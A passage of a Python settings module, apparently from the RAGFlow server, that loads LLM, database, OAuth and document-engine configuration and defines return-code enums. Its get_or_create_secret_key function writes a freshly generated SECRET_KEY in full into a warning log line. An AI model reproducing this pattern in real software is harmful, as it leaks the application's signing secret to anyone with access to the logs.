  31. LIGHTEN = int(os.environ.get("LIGHTEN", "0"))

  32. 

  33. LLM = None

  34. LLM_FACTORY = None

  35. LLM_BASE_URL = None

  36. CHAT_MDL = ""

  37. EMBEDDING_MDL = ""

  38. RERANK_MDL = ""

  39. ASR_MDL = ""

  40. IMAGE2TEXT_MDL = ""

  41. API_KEY = None

  42. PARSERS = None

  43. HOST_IP = None

  44. HOST_PORT = None

  45. SECRET_KEY = None

  46. FACTORY_LLM_INFOS = None

  47. 

  48. DATABASE_TYPE = os.getenv("DB_TYPE", "mysql")

  49. DATABASE = decrypt_database_config(name=DATABASE_TYPE)

  50. 

  51. # authentication

  52. AUTHENTICATION_CONF = None

  53. 

  54. # client

  55. CLIENT_AUTHENTICATION = None

  56. HTTP_APP_KEY = None

  57. GITHUB_OAUTH = None

  58. FEISHU_OAUTH = None

  59. OAUTH_CONFIG = None

  60. DOC_ENGINE = None

  61. docStoreConn = None

  62. 

  63. retrievaler = None

  64. kg_retrievaler = None

  65. 

  66. # user registration switch

  67. REGISTER_ENABLED = 1

  68. 

  69. 

  70. # sandbox-executor-manager

  71. SANDBOX_ENABLED = 0

  72. SANDBOX_HOST = None

  73. STRONG_TEST_COUNT = int(os.environ.get("STRONG_TEST_COUNT", "32"))

  74. 

  75. BUILTIN_EMBEDDING_MODELS = ["BAAI/bge-large-zh-v1.5@BAAI", "maidalun1020/bce-embedding-base_v1@Youdao"]

  76. 

  77. def get_or_create_secret_key():

  78.     secret_key = os.environ.get("RAGFLOW_SECRET_KEY")

  79.     if secret_key and len(secret_key) >= 32:

  80.         return secret_key

  81.     

  82.     # Check if there's a configured secret key

  83.     configured_key = get_base_config(RAG_FLOW_SERVICE_NAME, {}).get("secret_key")

  84.     if configured_key and configured_key != str(date.today()) and len(configured_key) >= 32:

  85.         return configured_key

  86.     

  87.     # Generate a new secure key and warn about it

  88.     import logging

  89.     new_key = secrets.token_hex(32)

  90.     logging.warning(

  91.         "SECURITY WARNING: Using auto-generated SECRET_KEY. "

  92.         f"Generated key: {new_key}"

  93.     )

  94.     return new_key

  95. 

  96. 

  97. def init_settings():

  98.     global LLM, LLM_FACTORY, LLM_BASE_URL, LIGHTEN, DATABASE_TYPE, DATABASE, FACTORY_LLM_INFOS, REGISTER_ENABLED

  99.     LIGHTEN = int(os.environ.get("LIGHTEN", "0"))

  100.     DATABASE_TYPE = os.getenv("DB_TYPE", "mysql")

  101.     DATABASE = decrypt_database_config(name=DATABASE_TYPE)

  102.     LLM = get_base_config("user_default_llm", {})

  103.     LLM_DEFAULT_MODELS = LLM.get("default_models", {})

  104.     LLM_FACTORY = LLM.get("factory")

  105.     LLM_BASE_URL = LLM.get("base_url")

  106.     try:

  107.         REGISTER_ENABLED = int(os.environ.get("REGISTER_ENABLED", "1"))

  108.     except Exception:

  109.         pass

  110. 

  111.     try:

  112.         with open(os.path.join(get_project_base_directory(), "conf", "llm_factories.json"), "r") as f:

  113.             FACTORY_LLM_INFOS = json.load(f)["factory_llm_infos"]

  114.     except Exception:

  115.         FACTORY_LLM_INFOS = []

  116. 

  117.     global CHAT_MDL, EMBEDDING_MDL, RERANK_MDL, ASR_MDL, IMAGE2TEXT_MDL

  118.     if not LIGHTEN:

  119.         EMBEDDING_MDL = BUILTIN_EMBEDDING_MODELS[0]

  120. 

  121.     if LLM_DEFAULT_MODELS:

  122.         CHAT_MDL = LLM_DEFAULT_MODELS.get("chat_model", CHAT_MDL)

  123.         EMBEDDING_MDL = LLM_DEFAULT_MODELS.get("embedding_model", EMBEDDING_MDL)

  124.         RERANK_MDL = LLM_DEFAULT_MODELS.get("rerank_model", RERANK_MDL)

  125.         ASR_MDL = LLM_DEFAULT_MODELS.get("asr_model", ASR_MDL)

  126.         IMAGE2TEXT_MDL = LLM_DEFAULT_MODELS.get("image2text_model", IMAGE2TEXT_MDL)

  127. 

  128.         # factory can be specified in the config name with "@". LLM_FACTORY will be used if not specified

  129.         CHAT_MDL = CHAT_MDL + (f"@{LLM_FACTORY}" if "@" not in CHAT_MDL and CHAT_MDL != "" else "")

  130.         EMBEDDING_MDL = EMBEDDING_MDL + (f"@{LLM_FACTORY}" if "@" not in EMBEDDING_MDL and EMBEDDING_MDL != "" else "")

  131.         RERANK_MDL = RERANK_MDL + (f"@{LLM_FACTORY}" if "@" not in RERANK_MDL and RERANK_MDL != "" else "")

  132.         ASR_MDL = ASR_MDL + (f"@{LLM_FACTORY}" if "@" not in ASR_MDL and ASR_MDL != "" else "")

  133.         IMAGE2TEXT_MDL = IMAGE2TEXT_MDL + (f"@{LLM_FACTORY}" if "@" not in IMAGE2TEXT_MDL and IMAGE2TEXT_MDL != "" else "")

  134. 

  135.     global API_KEY, PARSERS, HOST_IP, HOST_PORT, SECRET_KEY

  136.     API_KEY = LLM.get("api_key")

  137.     PARSERS = LLM.get(

  138.         "parsers", "naive:General,qa:Q&A,resume:Resume,manual:Manual,table:Table,paper:Paper,book:Book,laws:Laws,presentation:Presentation,picture:Picture,one:One,audio:Audio,email:Email,tag:Tag"

  139.     )

  140. 

  141.     HOST_IP = get_base_config(RAG_FLOW_SERVICE_NAME, {}).get("host", "127.0.0.1")

  142.     HOST_PORT = get_base_config(RAG_FLOW_SERVICE_NAME, {}).get("http_port")

  143. 

  144.     SECRET_KEY = get_or_create_secret_key()

  145. 

  146.     global AUTHENTICATION_CONF, CLIENT_AUTHENTICATION, HTTP_APP_KEY, GITHUB_OAUTH, FEISHU_OAUTH, OAUTH_CONFIG

  147.     # authentication

  148.     AUTHENTICATION_CONF = get_base_config("authentication", {})

  149. 

  150.     # client

  151.     CLIENT_AUTHENTICATION = AUTHENTICATION_CONF.get("client", {}).get("switch", False)

  152.     HTTP_APP_KEY = AUTHENTICATION_CONF.get("client", {}).get("http_app_key")

  153.     GITHUB_OAUTH = get_base_config("oauth", {}).get("github")

  154.     FEISHU_OAUTH = get_base_config("oauth", {}).get("feishu")

  155. 

  156.     OAUTH_CONFIG = get_base_config("oauth", {})

  157. 

  158.     global DOC_ENGINE, docStoreConn, retrievaler, kg_retrievaler

  159.     DOC_ENGINE = os.environ.get("DOC_ENGINE", "elasticsearch")

  160.     # DOC_ENGINE = os.environ.get('DOC_ENGINE', "opensearch")

  161.     lower_case_doc_engine = DOC_ENGINE.lower()

  162.     if lower_case_doc_engine == "elasticsearch":

  163.         docStoreConn = rag.utils.es_conn.ESConnection()

  164.     elif lower_case_doc_engine == "infinity":

  165.         docStoreConn = rag.utils.infinity_conn.InfinityConnection()

  166.     elif lower_case_doc_engine == "opensearch":

  167.         docStoreConn = rag.utils.opensearch_conn.OSConnection()

  168.     else:

  169.         raise Exception(f"Not supported doc engine: {DOC_ENGINE}")

  170. 

  171.     retrievaler = search.Dealer(docStoreConn)

  172.     from graphrag import search as kg_search

  173.     kg_retrievaler = kg_search.KGSearch(docStoreConn)

  174. 

  175.     if int(os.environ.get("SANDBOX_ENABLED", "0")):

  176.         global SANDBOX_HOST

  177.         SANDBOX_HOST = os.environ.get("SANDBOX_HOST", "sandbox-executor-manager")

  178. 

  179. 

  180. class CustomEnum(Enum):

  181.     @classmethod

  182.     def valid(cls, value):

  183.         try:

  184.             cls(value)

  185.             return True

  186.         except BaseException:

  187.             return False

  188. 

  189.     @classmethod

  190.     def values(cls):

  191.         return [member.value for member in cls.__members__.values()]

  192. 

  193.     @classmethod

  194.     def names(cls):

  195.         return [member.name for member in cls.__members__.values()]

  196. 

  197. 

  198. class RetCode(IntEnum, CustomEnum):

  199.     SUCCESS = 0

  200.     NOT_EFFECTIVE = 10

  201.     EXCEPTION_ERROR = 100

  202.     ARGUMENT_ERROR = 101

  203.     DATA_ERROR = 102

  204.     OPERATING_ERROR = 103

  205.     CONNECTION_ERROR = 105

  206.     RUNNING = 106

  207.     PERMISSION_ERROR = 108

  208.     AUTHENTICATION_ERROR = 109

  209.     UNAUTHORIZED = 401

  210.     SERVER_ERROR = 500

  211.     FORBIDDEN = 403

  212.     NOT_FOUND = 404